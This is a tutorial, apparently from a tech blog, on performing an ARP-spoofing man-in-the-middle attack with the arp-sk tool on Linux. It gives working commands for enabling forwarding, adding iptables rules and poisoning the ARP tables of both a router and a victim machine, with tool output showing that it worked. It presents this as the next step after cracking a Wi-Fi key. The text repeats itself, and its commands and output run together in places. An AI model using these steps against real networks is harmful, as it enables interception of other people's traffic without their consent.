Practice using arp-spoofing
In this article I will tell you how to use the arp-sk utility package in the GNU / Linux operating system to implement a man-in-the-middle attack on the arp protocol.
Why do we need such an attack:
There are a lot of articles on the hub - for example, to crack Wi-Fi. But what to do after the key is cracked? Here you can see one of the options.
The arp protocol is required for transmission in an Ethernet environment. Because the transfer is carried out by mac-addresses. Read more about the mac address on Wikipedia.
en.wikipedia.org/wiki/MAC-%D0%B0%D0%B4%D1%80%D0%B5%D1%81
In order for a message to be transferred from one network device to another, in particular from Victim to Router the computer needs to map IP address to mac address. Consider this process with the tcpdump utility
the first packet - the computer sends a broadcast message in order to find out the mac address that belongs to the IP address 192.168.4.1 and a request to send a response to 192.168.4.11. It is not visible here, but the computer 192.168.4.11, when sending this request, indicates its mac address as the source and the broadcast mac address (FF: FF: FF: FF: FF: FF) as the recipient address. Having received this packet, the network device should compare the ip-address with its own, and in case of coincidence, send the next packet.
the second packet - the device with the address 192.168.4.1 responds to the mac address that was specified in the request from its mac address, that the address 192.168.4.1 is at 00: 50: ba: 46: 5d: 92.
Due to the fact that the arp request is sent to the broadcast address, this message can be received by anyone who is in the same broadcast segment with the source. Therefore, one of the attack options arises - to constantly send a message about your mac address. At the same time, when the victim computer sends an arp request to the router, it immediately receives a response from the attacker. Accordingly, traffic will be sent to the attacker.
Our task: to get the Victim computer traffic using the Attacker computer.
For this we will use a spontaneous arp response. The arp protocol provides for the device to send an arp request or response if other devices do not require it. What is this for - for example, if the mac address of the router has changed. If the computer supports spontaneous arp, then it will rewrite the legitimate address to the address of the attacker.
Arp-sk: If the package is successfully compiled, install it. You can see the options for running the command using the following keys:
We must send to the router and the computer arp messages that the mac address of the other device is ours.
before that, we will configure the Attacker computer to redirect traffic. To do this, enable traffic redirection in the kernel:
Now enable traffic redirection in the packet filter. I use iptables, so I am adding enabling policies to the FORWARD chain. Since my network is using a test network for attack, I can add the following rules: These 2 rules allow traffic redirection by the attacking computer for the address 192.168.4.17. Attention! These rules are potentially dangerous, especially if you have several network interfaces. In this case, I recommend using more precise rules. Let's see the addresses Our address:
Addresses of other devices Let's look at the routing table of the Victim computer: Now we send the following arp packets to the devices: we substitute our own as the mac address of another device. The first on behalf of 192.168.4.17 that its mac address is now 00: 13: CE: 5C: 11: 34 we send to 192.168.4.1 (00: 50: ba: 46: 5d: 92); the second on behalf of 192.168.4.1 that his mac address is now 00: 13: CE: 5C: 11: 34 we are sending to 192.168.4.17 (00: 1c: bf: 41: 53: 4b) We will have the following output: Now let's look at Victim arp -table: Actually everything. Now you can run your favorite sniffer and get the necessary packages. For example ping before Yandex . Addition. If a firewall is installed on the computer, it may display a message about spoofing.
This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation “Unlawful access to computer information”
Why do we need such an attack:
There are a lot of articles on the hub - for example, to crack Wi-Fi. But what to do after the key is cracked? Here you can see one of the options.
Bit of theory
The arp protocol is required for transmission in an Ethernet environment. Because the transfer is carried out by mac-addresses. Read more about the mac address on Wikipedia.
en.wikipedia.org/wiki/MAC-%D0%B0%D0%B4%D1%80%D0%B5%D1%81
In order for a message to be transferred from one network device to another, in particular from Victim to Router the computer needs to map IP address to mac address. Consider this process with the tcpdump utility
# tcpdump -i eth1 -vvv
21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168.4.17, length 28
21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46the first packet - the computer sends a broadcast message in order to find out the mac address that belongs to the IP address 192.168.4.1 and a request to send a response to 192.168.4.11. It is not visible here, but the computer 192.168.4.11, when sending this request, indicates its mac address as the source and the broadcast mac address (FF: FF: FF: FF: FF: FF) as the recipient address. Having received this packet, the network device should compare the ip-address with its own, and in case of coincidence, send the next packet.
the second packet - the device with the address 192.168.4.1 responds to the mac address that was specified in the request from its mac address, that the address 192.168.4.1 is at 00: 50: ba: 46: 5d: 92.
Due to the fact that the arp request is sent to the broadcast address, this message can be received by anyone who is in the same broadcast segment with the source. Therefore, one of the attack options arises - to constantly send a message about your mac address. At the same time, when the victim computer sends an arp request to the router, it immediately receives a response from the attacker. Accordingly, traffic will be sent to the attacker.
Our task: to get the Victim computer traffic using the Attacker computer.
For this we will use a spontaneous arp response. The arp protocol provides for the device to send an arp request or response if other devices do not require it. What is this for - for example, if the mac address of the router has changed. If the computer supports spontaneous arp, then it will rewrite the legitimate address to the address of the attacker.
Conducting an attack
Installing the necessary software
Arp-sk: If the package is successfully compiled, install it. You can see the options for running the command using the following keys:
# wget sid.rstack.org/arp-sk/files/arp-sk-0.0.16.tgz
# tar xvzf arp-sk-0.0.16.tgz
# cd arp-sk-0.0.16/
# ./configure
# make# make install# arp-sk --helpUsage: arp-sk
-r --reply отправлять ARP ответ
-d --dst получатель в link layer ()
-s --src источник в link layer ()
-D --arp-dst получатель в ARP сообщении ([hostname|hostip][:MAC])
-S --arp-src источник в ARP сообщении ([hostname|hostip][:MAC])
-i --interface указать интерфейс (eth0) Address spoofing
We must send to the router and the computer arp messages that the mac address of the other device is ours.
before that, we will configure the Attacker computer to redirect traffic. To do this, enable traffic redirection in the kernel:
# echo 1 > /proc/sys/net/ipv4/ip_forwardNow enable traffic redirection in the packet filter. I use iptables, so I am adding enabling policies to the FORWARD chain. Since my network is using a test network for attack, I can add the following rules: These 2 rules allow traffic redirection by the attacking computer for the address 192.168.4.17. Attention! These rules are potentially dangerous, especially if you have several network interfaces. In this case, I recommend using more precise rules. Let's see the addresses Our address:
# iptables -I FORWARD 1 -s 192.168.4.17 -j ACCEPT
# iptables -I FORWARD 2 -d 192.168.4.17 -j ACCEPT# ifconfig eth1 | grep HW
eth1 Link encap:Ethernet HWaddr 00:13:CE:5C:11:34Addresses of other devices Let's look at the routing table of the Victim computer: Now we send the following arp packets to the devices: we substitute our own as the mac address of another device. The first on behalf of 192.168.4.17 that its mac address is now 00: 13: CE: 5C: 11: 34 we send to 192.168.4.1 (00: 50: ba: 46: 5d: 92); the second on behalf of 192.168.4.1 that his mac address is now 00: 13: CE: 5C: 11: 34 we are sending to 192.168.4.17 (00: 1c: bf: 41: 53: 4b) We will have the following output: Now let's look at Victim arp -table: Actually everything. Now you can run your favorite sniffer and get the necessary packages. For example ping before Yandex . Addition. If a firewall is installed on the computer, it may display a message about spoofing.
# arp -an
? (192.168.4.1) at 00:50:ba:46:5d:92 [ether] on eth1
? (192.168.4.17) at 00:1c:bf:41:53:4b [ether] on eth1
# arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.17 -d 00:50:ba:46:5d:92 -D 192.168.4.1
# arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.1 -d 00:1c:bf:41:53:4b -D 192.168.4.17+ Initialization of the packet structure
+ Running mode "reply"
+ Ifname: eth1
+ Source MAC: 00:13:ce:5c:11:34
+ Source ARP MAC: 00:13:ce:5c:11:34
+ Source ARP IP : 192.168.4.1
+ Target MAC: 00:1c:bf:41:53:4b
+ Target ARP MAC: 00:1c:bf:41:53:4b
+ Target ARP IP : 192.168.4.17
--- Start classical sending ---
TS: 21:30:44.338540
To: 00:1c:bf:41:53:4b From: 00:13:ce:5c:11:34 0x0806
ARP For 192.168.4.17 (00:1c:bf:41:53:4b):
192.168.4.1 is at 00:13:ce:5c:11:34 This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation “Unlawful access to computer information”